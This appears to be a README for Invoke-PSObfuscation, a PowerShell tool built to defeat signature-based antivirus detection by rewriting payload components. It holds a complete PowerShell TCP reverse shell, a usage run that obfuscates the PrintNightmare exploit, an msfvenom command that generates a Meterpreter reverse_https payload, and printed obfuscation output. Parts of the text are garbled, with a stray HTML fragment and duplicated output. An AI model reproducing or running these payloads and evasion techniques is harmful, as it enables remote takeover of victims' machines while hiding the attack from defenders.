Like many other programming languages, PowerShell can be broken down into many different components that make up the executable logic. This allows us to defeat signature-based detections with relative ease by changing how we represent individual components within a payload to a form an obscure or unintelligible derivative.

Keep in mind that targeting every component in complex payloads is very instrusive. This tool is built so that you can target the components you want to obfuscate in a controlled manner. I have found that a lot of signatures can be defeated simply by targeting cmdlets, variables and any comments. When using this against complex payloads, such as print nightmare, keep in mind that custom function parameters / variables will also be changed. Always be sure to properly test any resulting payloads and ensure you are aware of any modified named paramters.

Component types such as pipes and pipeline variables are introduced here to help make your payload more obscure and harder to decode.

Supported Types

  • Aliases (iex)
  • Cmdlets (New-Object)
  • Comments (# and <# #>)
  • Integers (4444)
  • Methods ($client.GetStream())
  • Namespace Classes (System.Net.Sockets.TCPClient)
  • Pipes (|)
  • Pipeline Variables ($_)
  • Strings ("value" | 'value')
  • Variables ($client)


Each component has its own dedicated generator that contains a list of possible static or dynamically generated values that are randomly selected during each execution. If there are multiple instances of a component, then it will iterative each of them individually with a generator. This adds a degree of randomness each time you run this tool against a given payload so each iteration will be different. The only exception to this is variable names.

If an algorithm related to a specific component starts to cause a payload to flag, the current design allows us to easily modify the logic for that generator without compromising the entire script.

$Picker = 1..6 | Get-Random
Switch ($Picker) {
1 { $NewValue = 'Stay' }
2 { $NewValue = 'Off' }
3 { $NewValue = 'Ronins' }
4 { $NewValue = 'Lawn' }
5 { $NewValue = 'And' }
6 { $NewValue = 'Rocks' }


This framework and resulting payloads have been tested on the following operating system and PowerShell versions. The resulting reverse shells will not work on PowerShell v2.0

PS Version OS Tested Invoke-PSObfucation.ps1 Reverse Shell
7.1.3 Kali 2021.2 Supported Supported
5.1.19041.1023 Windows 10 10.0.19042 Supported Supported
5.1.21996.1 Windows 11 10.0.21996 Supported Supported

Usage Examples

CVE-2021-34527 (PrintNightmare)

└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.
Type 'help' to get help.

PS /home/tristram> . ./Invoke-PSObfuscation.ps1
PS /home/tristram> Invoke-PSObfuscation -Path .\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printnightmare.ps1

>> Layer 0 Obfuscation

[*] Obfuscating namespace classes
[*] Obfuscating cmdlets
[*] Obfuscating variables
[-] -DriverName is now -QhYm48JbCsqF
[-] -NewUser is now -ybrcKe
[-] -NewPassword is now -ZCA9QHerOCrEX84gMgNwnAth
[-] -DLL is now -dNr
[-] -ModuleName is now -jd
[-] -Module is now -tu3EI0q1XsGrniAUzx9WkV2o
[-] -Type is now -fjTOTLDCGufqEu
[-] -FullName is now -0vEKnCqm
[-] -EnumElements is now -B9aFqfvDbjtOXPxrR< br/>[-] -Bitfield is now -bFUCG7LB9gq50p4e
[-] -StructFields is now -xKryDRQnLdjTC8
[-] -PackingSize is now -0CB3X
[-] -ExplicitLayout is now -YegeaeLpPnB
[*] Removing comments
[*] Writing payload to o-printnightmare.ps1
[*] Done

PS /home/tristram>

PowerShell Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient("",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Generator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444) Generator 1 >> 65535 >> $((65535)) [*] Obfuscating strings Generator 2 >> >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51)) Generator 2 >> PS >> $([char](1*80/1)+[char](86+83-86)+[char](0+32-0)) Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_}) [*] Obfuscating cmdlets Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Generator 1 >> Out-String >> & (("Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B")[13,16,3,25,35,3,55,57,17,49] -join '') [*] Writing payload to /home/tristram/obfuscated.ps1 [*] Done" dir="auto">
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.
Type 'help' to get help.

PS /home/tristram> . ./Invoke-PSObfuscation.ps1
PS /home/tristram> Invoke-PSObfuscation -Path ./revshell.ps1 -Integers -Cmdlets -Strings -ShowChanges

>> Layer 0 Obfuscation

[*] Obfuscating integers
Generator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444)
Generator 1 >> 65535 >> $((65535))
[*] Obfuscating strings
Generator 2 >> >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51))
Generator 2 >> PS >> $([char](1 *80/1)+[char](86+83-86)+[char](0+32-0))
Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_})
[*] Obfuscating cmdlets
Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_})
Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_})
Generator 1 >> Out-String >> & (("Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B")[13,16,3,25,35,3,55,57,17,49] -join '')
[*] Writing payload to /home/tristram/obfuscated.ps1
[*] Done

Obfuscated PowerShell Reverse Shell

Meterpreter PowerShell Shellcode

└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.
Type 'help' to get help.

PS /home/kali> msfvenom -p windows/meterpreter/reverse_https LHOST= LPORT=443 EXITFUNC=thread -f ps1 -o meterpreter.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 686 bytes
Final size of ps1 file: 3385 bytes
Saved as: meterpreter.ps1
PS /home/kali> . ./Invoke-PSObfuscation.ps1
PS /home/kali> Invoke-PSObfuscation -Path ./meterpreter.ps1 -Integers -Variables -OutFile o-meterpreter.ps1

>> Layer 0 Obfuscation

[*] Obfuscating integers
[*] Obfuscating variables
[*] Writing payload to o-meterpreter.ps1
[*] Done

Comment-Based Help

Transforms PowerShell scripts into something obscure, unclear, or unintelligible.

Where most obfuscation tools tend to add layers to encapsulate standing code, such as base64 or compression,
they tend to leave the intended payload intact, which essentially introduces chokepoints. Invoke-PSObfuscation
focuses on replacing the existing components of your code, or layer 0, with alternative values.

A user provided PowerShell payload via a flat file.

The all switch is used to engage every supported component to obfuscate a given payload. This action is very intrusive
and could result in your payload being broken. There should be no issues when using this with the vanilla reverse
shell. However, it's recommended to target specific components with more advanced payloads. Keep in mind that some of
the generators introduced in this script may even confuse your ISE so be sure to test properly.

The aliases switch is used to instruct the function to obfuscate aliases.

The cmdlets switch is used to instruct the function to obfuscate cmdlets.

The comments switch is used to instruct the function to remove all comments.

The integers switch is used to instruct the function to obfuscate integers.

The methods switch is used to instruct the function to obfuscate method invocations.

.PARAMETER NamespaceClasses
The namespaceclasses switch is used to instruct the function to obfuscate namespace classes.

The pipes switch is used to in struct the function to obfuscate pipes.

.PARAMETER PipelineVariables
The pipeline variables switch is used to instruct the function to obfuscate pipeline variables.

.PARAMETER ShowChanges
The ShowChanges switch is used to instruct the script to display the raw and obfuscated values on the screen.

The strings switch is used to instruct the function to obfuscate prompt strings.

.PARAMETER Variables
The variables switch is used to instruct the function to obfuscate variables.

PS C:\> Invoke-PSObfuscation -Path .\revshell.ps1 -All

PS C:\> Invoke-PSObfuscation -Path .\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printernightmare.ps1

System.String, System.String

Additional information abo ut the function.
